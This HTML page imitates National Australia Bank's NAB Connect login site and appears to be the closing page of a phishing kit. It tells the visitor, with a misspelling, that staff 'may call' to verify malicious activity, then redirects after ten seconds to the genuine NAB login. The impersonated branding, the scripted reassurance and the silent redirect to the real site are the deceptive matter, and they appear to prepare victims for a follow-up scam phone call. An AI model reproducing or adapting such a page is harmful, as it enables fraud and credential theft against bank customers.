<html lang="en"><head>
    <meta http-equiv="refresh" content="10;URL='https://nabconnect.nab.com.au/login'"> 
    <script type="text/JavaScript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script type="text/JavaScript" src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
    <script type="text/JavaScript" src="https://code.jquery.com/jquery-3.3.1.js"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&amp;display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.0/css/all.css">
    <title>Log into NAB Connect</title>
    <style type="text/css">
    @font-face {
        font-family: "NABImpact";
        src: url("./css/fonts/NABImpact.woff")
    }

    @font-face {
        font-family: "SourceSansPro";
        src: url("./css/fonts/SourceSans-Regular.woff")
    }



    .jChhnh {
        font-size: 2rem;
        white-space: nowrap;
        text-decoration: none;
        padding-top: 0.1875rem;
    }

    .iOUAUb {
        margin: 0px;
        outline: transparent;
        color: rgb(255, 255, 255);
        font-weight: 400;
        font-family: NABImpact, SourceSansPro, Helvetica, Arial, sans-serif;

        padding-left: 15px;
        line-height: 3rem;
    }

    .family_main {
        font-family: NABImpact, SourceSansPro, Helvetica, Arial, sans-serif;
    }

    body {
        font-family: SourceSansPro, Helvetica, Arial, sans-serif;
    }

    label {
        font-weight: 500;
    }

    input {
        padding: 0.75rem 1rem !important;
    }

    .erTFQf {
        transition: border-color 200ms ease-in 0s, box-shadow 200ms ease-in 0s, background-color 200ms ease-in 0s, color 200ms ease-in 0s, fill 200ms ease-in 0s, width 200ms ease-in-out 0s;
        font-size: 1rem;
        line-height: 1.5rem;
        border: 2px solid transparent;
        border-radius: 4px;
        box-sizing: border-box;
        font-family: SourceSansPro, Helvetica, Arial, sans-serif;
        box-shadow: none;
        font-weight: 700;
        min-width: 8rem;
        vertical-align: middle;
        cursor: pointer;
        min-height: 3rem;
        color: rgb(255, 255, 255);
        background-color: rgb(194, 0, 0);
        padding: 0.5rem 1.5rem;
        margin-top: 30px;
    }

    .kqhNJt {
        background-color: rgb(0, 0, 0);
        border-radius: 4px;
        overflow: hidden;
        padding: 0.5rem 2rem 1.5rem;
        color: white;
    }


    @media(max-width: 700px) {
        .hide {
            display: none !important;
        }
    }
    </style>
</head>

<body>
    <div class="container-fluid" style="background-color: black;">
        <div class="row">
            <div class="col-lg-8 mx-auto p-2">
                <div class="d-flex justify-content-between">
                    <div class="d-flex">
                        <img src="images/log.svg" class="img-fluid" style="width:5.55rem">
                        <h1 class="H1style__StyledH1-sc-1n8ovcg-0 iOUAUb StyledDesktopHeading-isRZKO jChhnh">NAB Connect</h1>
                    </div>
                    <div class="d-flex align-items-center hide">
                        <a href="#" class="text-white" style="text-decoration: none;">NAB Security &nbsp;|&nbsp; Help &nbsp;|&nbsp; Contact us</a>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="container-fluid pb-5" style="background: url('images/bg.svg') center center / cover no-repeat fixed rgb(0, 0, 0)">
        <div class="row">
            <div class="col-lg-7 mx-auto my-4">
                <div class="row">
                    <div class="col-lg-7">
                        <div>
                            <div class="bg-white" style="border-radius: 4px;">
                                <div style="padding: 30px 20px;">
                                    <h1 class="family_main">WE MAY CALL YOU</h1>
                                    <p>A member of the nab connect team may contact you within 24 hours to verify malacious activity, until then you can continue to login as normal, you will be redirected to the login screen</p>
                                </div>
                                <div style="background-color: rgb(230, 230, 230);padding: 1.5rem;">
                                    <h5>Get NAB Connect for your business</h5>
                                    <span><a href="#" style="color:rgb(194, 0, 0);font-size: 1rem;text-decoration: underline;">Find out how to get started with NAB Connect &gt;</a></span>
                                </div>
                            </div>
                        </div>
                    </div>
                    
                </div>
            </div>
        </div>
    </div>
    <div class="container-fluid" style="background:black; padding: 40px 0px;">
        <div>
            <div class="col-lg-10 mx-auto">
                <div class="row d-flex justify-content-center">
                    <div class="text-center text-white col-lg-2">
                        <img src="images/1.svg" class="img-fluid" style="width: 2.5rem;">
                        <p>Having trouble logging in?</p>
                        <p>Trouble shoot and get help with NAB Connect login.</p>
                    </div>
                    <div class="text-center text-white col-lg-2">
                        <img src="images/2.svg" class="img-fluid" style="width: 2.5rem;">
                        <p>Register your PayID</p>
                        <p>Receive payments faster without a BSB and account number by setting up your PayID. Learn how you can set up PayID.</p>
                    </div>
                    <div class="text-center text-white col-lg-2">
                        <img src="images/3.svg" class="img-fluid" style="width: 2.5rem;">
                        <p>Security tips</p>
                        <p>Visit the NAB Connect Security page or nab.com.au/security for more security information and advice.</p>
                    </div>
                    <div class="text-center text-white col-lg-2">
                        <img src="images/4.svg" class="img-fluid" style="width: 2.5rem;">
                        <p>Get help</p>
                        <p>Visit NAB Connect help to learn about making payments, mobile tokens, creating users, attend a training session and more.</p>
                    </div>
                    <div class="text-center text-white col-lg-2">
                        <img src="images/5.svg" class="img-fluid" style="width: 2.5rem;">
                        <p>Report a hoax</p>
                        <p>Report suspicious emails and text messages to phish@nab.com.au</p>
                    </div>
                </div>
            </div>
        </div>
        <div class="col-lg-10 mx-auto text-white">
            <div class="d-flex justify-content-between">
                <div>
                    <p>© National Australia Bank Limited</p>
                </div>
                <div>
                    <p>Disclaimer &nbsp;|&nbsp; Privacy Policy</p>
                </div>
            </div>
        </div>
    </div>

   



</body></html>